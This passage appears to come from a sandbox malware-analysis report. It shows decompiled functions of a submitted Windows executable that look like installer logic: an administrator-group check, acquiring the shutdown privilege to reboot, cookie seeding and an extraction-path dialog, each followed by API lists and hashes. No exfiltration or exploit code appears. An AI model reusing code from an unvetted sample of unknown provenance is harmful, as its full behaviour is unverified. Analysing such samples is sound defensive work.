                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0x178a2c != 0 &&  *0x178b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x179a3c, 0x178b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E001766C8(0x178b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00176247
                                                                                                                                                                                                    0x0017626a
                                                                                                                                                                                                    0x00176272
                                                                                                                                                                                                    0x00176249
                                                                                                                                                                                                    0x00176255
                                                                                                                                                                                                    0x0017625f
                                                                                                                                                                                                    0x00176264
                                                                                                                                                                                                    0x00176264
                                                                                                                                                                                                    0x00176284
                                                                                                                                                                                                    0x00175dc0
                                                                                                                                                                                                    0x00175dc0
                                                                                                                                                                                                    0x00175dca
                                                                                                                                                                                                    0x00175e22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175dcc
                                                                                                                                                                                                    0x00175dce
                                                                                                                                                                                                    0x00175e24
                                                                                                                                                                                                    0x00175e24
                                                                                                                                                                                                    0x00175e2c
                                                                                                                                                                                                    0x00175e47
                                                                                                                                                                                                    0x00175e4a
                                                                                                                                                                                                    0x001761d2
                                                                                                                                                                                                    0x001761e2
                                                                                                                                                                                                    0x001761e7
                                                                                                                                                                                                    0x001761ee
                                                                                                                                                                                                    0x001761f1
                                                                                                                                                                                                    0x001761f1
                                                                                                                                                                                                    0x001761f8
                                                                                                                                                                                                    0x001761f8
                                                                                                                                                                                                    0x00175e50
                                                                                                                                                                                                    0x00175e53
                                                                                                                                                                                                    0x00176109
                                                                                                                                                                                                    0x0017611f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176125
                                                                                                                                                                                                    0x00176137
                                                                                                                                                                                                    0x0017613a
                                                                                                                                                                                                    0x0017613c
                                                                                                                                                                                                    0x0017613e
                                                                                                                                                                                                    0x0017613e
                                                                                                                                                                                                    0x00176141
                                                                                                                                                                                                    0x00176141
                                                                                                                                                                                                    0x00176143
                                                                                                                                                                                                    0x00176144
                                                                                                                                                                                                    0x0017614a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176150
                                                                                                                                                                                                    0x00176152
                                                                                                                                                                                                    0x0017615c
                                                                                                                                                                                                    0x00176170
                                                                                                                                                                                                    0x00176172
                                                                                                                                                                                                    0x0017617c
                                                                                                                                                                                                    0x00176190
                                                                                                                                                                                                    0x00176190
                                                                                                                                                                                                    0x00176196
                                                                                                                                                                                                    0x001761a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001761ab
                                                                                                                                                                                                    0x001761b9
                                                                                                                                                                                                    0x001761c6
                                                                                                                                                                                                    0x001761c6
                                                                                                                                                                                                    0x0017617e
                                                                                                                                                                                                    0x00176180
                                                                                                                                                                                                    0x0017618a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017618a
                                                                                                                                                                                                    0x0017615e
                                                                                                                                                                                                    0x00176160
                                                                                                                                                                                                    0x0017616a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017616a
                                                                                                                                                                                                    0x0017615c
                                                                                                                                                                                                    0x0017614a
                                                                                                                                                                                                    0x0017610b
                                                                                                                                                                                                    0x0017610e
                                                                                                                                                                                                    0x0017610e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e59
                                                                                                                                                                                                    0x00175e59
                                                                                                                                                                                                    0x00175e5c
                                                                                                                                                                                                    0x0017604f
                                                                                                                                                                                                    0x00176056
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017605c
                                                                                                                                                                                                    0x0017606e
                                                                                                                                                                                                    0x00176071
                                                                                                                                                                                                    0x00176073
                                                                                                                                                                                                    0x00176075
                                                                                                                                                                                                    0x00176075
                                                                                                                                                                                                    0x00176078
                                                                                                                                                                                                    0x00176078
                                                                                                                                                                                                    0x0017607a
                                                                                                                                                                                                    0x0017607b
                                                                                                                                                                                                    0x00176081
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176087
                                                                                                                                                                                                    0x00176087
                                                                                                                                                                                                    0x0017608d
                                                                                                                                                                                                    0x0017609c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001760a2
                                                                                                                                                                                                    0x001760aa
                                                                                                                                                                                                    0x001760b2
                                                                                                                                                                                                    0x001760b7
                                                                                                                                                                                                    0x001760bd
                                                                                                                                                                                                    0x001760bf
                                                                                                                                                                                                    0x001760bf
                                                                                                                                                                                                    0x001760d6
                                                                                                                                                                                                    0x001760e0
                                                                                                                                                                                                    0x001760e7
                                                                                                                                                                                                    0x001760f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001760f5
                                                                                                                                                                                                    0x0017609c
                                                                                                                                                                                                    0x00176081
                                                                                                                                                                                                    0x00175e62
                                                                                                                                                                                                    0x00175e62
                                                                                                                                                                                                    0x00175e65
                                                                                                                                                                                                    0x00175fd3
                                                                                                                                                                                                    0x00175fe9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175fef
                                                                                                                                                                                                    0x00175fef
0x00175ff7 0x00175ffd 0x00176003 0x00176006 0x00176011 0x00176014 0x0017603d 0x00176016
0x00176018 0x00176019 0x0017601b 0x00176033 0x0017601d 0x00176020 0x00176029 0x00176022
0x00176022 0x00176022 0x00176020 0x0017601b 0x00176042 0x00176044 0x00176046 0x0017604a
0x00175ff7 0x00175fd5 0x00175fd8 0x00175fd8 0x00000000 0x00175e6b 0x00175e6b 0x00175e6e
0x00175f8b 0x00175f99 0x00000000 0x00175f9f 0x00175fa7 0x00175faf 0x00000000 0x00175fb1
0x00175fb3 0x00000000 0x00175fb5 0x00175fb7 0x00000000 0x00175fb9 0x00000000 0x00175fb9
0x00175fb7 0x00175fb3 0x00175faf 0x00175f8d 0x00175f8d 0x00175f8d 0x00175f8f 0x00175fc1
0x00175fc1 0x00175fc1 0x00000000 0x00175e74 0x00175e74 0x00175e77 0x00175ea0 0x00175ebd
0x00175f79 0x00000000 0x00175f7f 0x00175ec3 0x00175ec3 0x00175ecc 0x00175ed4 0x00175ed6
0x00175edc 0x00175edf 0x00175eea 0x00175eed 0x00175f3f 0x00175f40 0x00000000 0x00175eef
0x00175eef 0x00175ef2 0x00175f34 0x00175ef4 0x00175ef4 0x00175ef7 0x00175f2b 0x00000000
0x00175ef9 0x00175ef9 0x00175efc 0x00175f22 0x00000000 0x00175efe 0x00175eff 0x00175f02
0x00175f16 0x00175f04 0x00175f07 0x00175f0d 0x00175f46 0x00175f46 0x00175f09 0x00175f09
0x00175f09 0x00175f07 0x00175f02 0x00175efc 0x00175ef7 0x00175ef2 0x00175f4c 0x00175f4e
0x00175f50 0x00175f54 0x00175ed4 0x00175ea2 0x00175ea4 0x00175eaf 0x00175eaf 0x00000000
0x00175e79 0x00175e7d 0x00000000 0x00175e83 0x00175e83 0x00175e83 0x00175e85 0x00175e85
0x00175e8e 0x00000000 0x00175e94 0x00000000 0x00175e94 0x00175e8e 0x00175e7d 0x00175e77
0x00175e6e 0x00175e65 0x00175e5c 0x00000000 0x00000000 0x00000000 0x00175dd0 0x00175dd0
0x00175dd0 0x00000000 0x00175dd0 0x00175dce 0x00175dca 0x00175dba 0x00000000 0x00175d00
0x00175dd9 0x00175e04 0x001761fe 0x00175e0a 0x00175e0c 0x00175e17 0x00175e17 0x00175e04
0x00176200 0x00176200 0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00175CEE
• GetModuleFileNameA.KERNEL32(00178B3E,00000104,00000000,?,?), ref: 00175DFC
• CharUpperA.USER32(?), ref: 00175E3E
• CharUpperA.USER32(-00000052), ref: 00175EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00175F6F
• CharUpperA.USER32(?), ref: 00175FA7
• CharUpperA.USER32(-0000004E), ref: 00176008
• CharUpperA.USER32(?), ref: 001760AA
• CloseHandle.KERNEL32(00000000,00171140,00000000,00000040,00000000), ref: 001761F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001761F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 066d585d993968a5151e7130fe249da9549e111c7ec7f66bd66cd7e66e1a62b1
                                                                                                                                                                                                    • Instruction ID: ef32dc51e608541f74fd2e8d596e24f7a7a38e67f5b4a9fb5f8f431cf5fca7d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066d585d993968a5151e7130fe249da9549e111c7ec7f66bd66cd7e66e1a62b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD13871A48E545EDB358B388C4C7BA7B77AB56300F54C0AAD48ED7591DBF08EC68B40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
			E001718A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* _t15;
				signed int _t23;
				signed int _t25;
				long _t45;
				void* _t49;
				int _t50;
				void* _t51;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x178004; // 0x4ffa21aa, stack security cookie seed
				_v8 = _t23 ^ _t53;
				_t25 =  *0x178128; // 0x2, cached result: 2 = "not yet determined"
				_t45 = 0;
				_v12 = 0x500; // with _v16 zeroed this forms the 6-byte SECURITY_NT_AUTHORITY {0,0,0,0,0,5}
				_t50 = 2; // TokenGroups (also reused as the sub-authority count below)
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00176CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51); // stack cookie check and return
				}
				// First elevation check via a separate routine; if it answers, cache the result and return
				if(E001717EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x178128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) { // 8 = TOKEN_QUERY
					goto L20;
				}
				// Size query: success here or any error other than ERROR_INSUFFICIENT_BUFFER (0x7a) is unexpected
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24); // buffer for the TOKEN_GROUPS structure
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					// Build S-1-5-32-544 (BUILTIN\Administrators): SECURITY_BUILTIN_DOMAIN_RID = 0x20, DOMAIN_ALIAS_RID_ADMINS = 0x220
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) { // TOKEN_GROUPS.GroupCount
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4, start of the TOKEN_GROUPS.Groups array
						_t50 = _t15;
						// Walk each SID_AND_ATTRIBUTES entry (8 bytes) looking for the Administrators SID
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x178128 = 1; // token holds the Administrators group: cache and report "elevated"
						_v20 = 1;
						goto L14;
					}
				}
			}

                                                                                                                                                                                                    0x001718a3
                                                                                                                                                                                                    0x001718a3
                                                                                                                                                                                                    0x001718ab
                                                                                                                                                                                                    0x001718b2
                                                                                                                                                                                                    0x001718b5
                                                                                                                                                                                                    0x001718be
                                                                                                                                                                                                    0x001718c0
                                                                                                                                                                                                    0x001718c6
                                                                                                                                                                                                    0x001718c7
                                                                                                                                                                                                    0x001718ca
                                                                                                                                                                                                    0x001718cf
                                                                                                                                                                                                    0x001719c9
                                                                                                                                                                                                    0x001719d8
                                                                                                                                                                                                    0x001719d8
                                                                                                                                                                                                    0x001718df
                                                                                                                                                                                                    0x001719b8
                                                                                                                                                                                                    0x001719bd
                                                                                                                                                                                                    0x001719bf
                                                                                                                                                                                                    0x001719bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001719bd
                                                                                                                                                                                                    0x001718fa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171912

APIs
  • Part of subcall function 001717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001718DD), ref: 0017181A
  • Part of subcall function 001717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0017182C
  • Part of subcall function 001717EE: AllocateAndInitializeSid.ADVAPI32(001718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001718DD), ref: 00171855
  • Part of subcall function 001717EE: FreeSid.ADVAPI32(?,?,?,?,001718DD), ref: 00171883
  • Part of subcall function 001717EE: FreeLibrary.KERNEL32(00000000,?,?,?,001718DD), ref: 0017188A
• GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001718EB
• OpenProcessToken.ADVAPI32(00000000), ref: 001718F2
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0017190A
• GetLastError.KERNEL32 ref: 00171918
• LocalAlloc.KERNEL32(00000000,?,?), ref: 0017192C
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00171944
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00171964
• EqualSid.ADVAPI32(00000004,?), ref: 0017197A
• FreeSid.ADVAPI32(?), ref: 0017199C
• LocalFree.KERNEL32(00000000), ref: 001719A3
• CloseHandle.KERNEL32(?), ref: 001719AD
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 98e064f026bf6b2c3ff33d162be8e22eeda9c29b4ae50aabd97f9bc9ebcf8a8e
• Instruction ID: 0e4dbffcf7e270d7476923b6a355aee9bce39e7c6fda045ba52ec9c25b17147c
• Opcode Fuzzy Hash: 98e064f026bf6b2c3ff33d162be8e22eeda9c29b4ae50aabd97f9bc9ebcf8a8e
• Instruction Fuzzy Hash: 30311E71A00209BFDB209FA9DC58ABFBBBCFF44704F504429F649E2550E7319986CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
			E00171F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x179a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x178004; // 0x4ffa21aa
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E001744B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00176CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E001744B9(0, 0x522, 0x171140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00171EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}


















APIs
• GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00171EFB
• OpenProcessToken.ADVAPI32(00000000), ref: 00171F02
• ExitWindowsEx.USER32(00000002,00000000), ref: 00171FD3
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Process$CurrentExitOpenTokenWindows
• String ID: SeShutdownPrivilege
• API String ID: 2795981589-3733053543
• Opcode ID: d2e8ae99df4b00ce91176ef6c7d0b79a53d1f2639574e3488920dd29ddde31fe
• Instruction ID: d87d8b3ba041bfe608ad4f76c309a599f43ef081a8ce63176d117ad85ee25325
• Opcode Fuzzy Hash: d2e8ae99df4b00ce91176ef6c7d0b79a53d1f2639574e3488920dd29ddde31fe
• Instruction Fuzzy Hash: 7F21F771B402057BEB205BA99C4AFBF77B8EFC5B11F508428FA0EE6580D77488C59261
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00177155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x178004; // 0x4ffa21aa
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x178004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x178004 = _t39;
				}
				_t37 =  !_t36;
				 *0x178008 = _t37;
				return _t37;
			}

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177182
• GetCurrentProcessId.KERNEL32 ref: 00177191
• GetCurrentThreadId.KERNEL32 ref: 0017719A
• GetTickCount.KERNEL32 ref: 001771A3
• QueryPerformanceCounter.KERNEL32(?), ref: 001771B8
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00176CF0(struct _EXCEPTION_POINTERS* _a4) {
    // Decompiler output: hand the exception record to the default filter, then fail fast.
    SetUnhandledExceptionFilter(0);
    UnhandledExceptionFilter(_a4);
    // 0xc0000409 is STATUS_STACK_BUFFER_OVERRUN, the exit code of the CRT /GS fail-fast path.
    return TerminateProcess(GetCurrentProcess(), 0xc0000409);
}




APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00176E26,00171000), ref: 00176CF7
• UnhandledExceptionFilter.KERNEL32(00176E26,?,00176E26,00171000), ref: 00176D00
• GetCurrentProcess.KERNEL32(C0000409,?,00176E26,00171000), ref: 00176D0B
• TerminateProcess.KERNEL32(00000000,?,00176E26,00171000), ref: 00176D12
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 76%
// Decompiler output of a dialog procedure: _a4 = hWnd, _a8 = message, _a12 = wParam.
E00173210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
    void* __edi;
    void* _t6;
    void* _t10;
    int _t20;
    int _t21;
    int _t23;
    char _t24;
    long _t25;
    int _t27;
    int _t30;
    void* _t32;
    int _t33;
    int _t34;
    int _t37;
    int _t38;
    int _t39;
    void* _t42;
    void* _t46;
    CHAR* _t49;
    void* _t58;
    void* _t63;
    struct HWND__* _t64;

    _t64 = _a4;
    _t6 = _a8 - 0x10;
    if(_t6 == 0) {
        // _a8 == 0x10: WM_CLOSE, dismiss the dialog.
        _push(0);
        L38:
        EndDialog(_t64, ??);
        L39:
        __eflags = 1;
        return 1;
    }
    _t42 = 1;
    _t10 = _t6 - 0x100;
    if(_t10 == 0) {
        // _a8 == 0x110: WM_INITDIALOG, centre the dialog and set up the edit control.
        E001743D0(_t64, GetDesktopWindow());
        SetWindowTextA(_t64, "nst0dum");
        // 0xc5 is EM_LIMITTEXT: cap edit control 0x835 to 0x103 characters.
        SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
        __eflags =  *0x179a40 - _t42; // 0x3
        if(__eflags == 0) {
            EnableWindow(GetDlgItem(_t64, 0x836), 0);
        }
        L36:
        return _t42;
    }
    if(_t10 == _t42) {
        // _a8 == 0x111: WM_COMMAND.
        _t20 = _a12 - 1;
        __eflags = _t20;
        if(_t20 == 0) {
            // wParam == 1: IDOK. Read the edit control into the 0x104-byte buffer at 0x1791e4.
            _t21 = GetDlgItemTextA(_t64, 0x835, 0x1791e4, 0x104);
            __eflags = _t21;
            if(_t21 == 0) {
                L32:
                _t58 = 0x4bf;
                _push(0);
                _push(0x10);
                _push(0);
                _push(0);
                L25:
                E001744B9(_t64, _t58);
                goto L39;
            }
            // Inlined strlen over the buffer.
            _t49 = 0x1791e4;
            do {
                _t23 =  *_t49;
                _t49 =  &(_t49[1]);
                __eflags = _t23;
            } while (_t23 != 0);
            __eflags = _t49 - 0x1791e5 - 3;
            if(_t49 - 0x1791e5 < 3) {
                goto L32;
            }
            // Second character 0x3a is ':', i.e. a drive-letter path.
            _t24 =  *0x1791e5; // 0x3a
            __eflags = _t24 - 0x3a;
            if(_t24 == 0x3a) {
                L21:
                _t25 = GetFileAttributesA(0x1791e4);
                // 0xffffffff is INVALID_FILE_ATTRIBUTES.
                __eflags = _t25 - 0xffffffff;
                if(_t25 != 0xffffffff) {
                    L26:
                    E0017658A(0x1791e4, 0x104, 0x171140);
                    _t27 = E001758C8(0x1791e4);
                    __eflags = _t27;
                    if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x1791e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x1791e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0017597D(0x1791e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x1791e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x1791e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E001744B9(_t64, 0x54a, 0x1791e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x1791e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
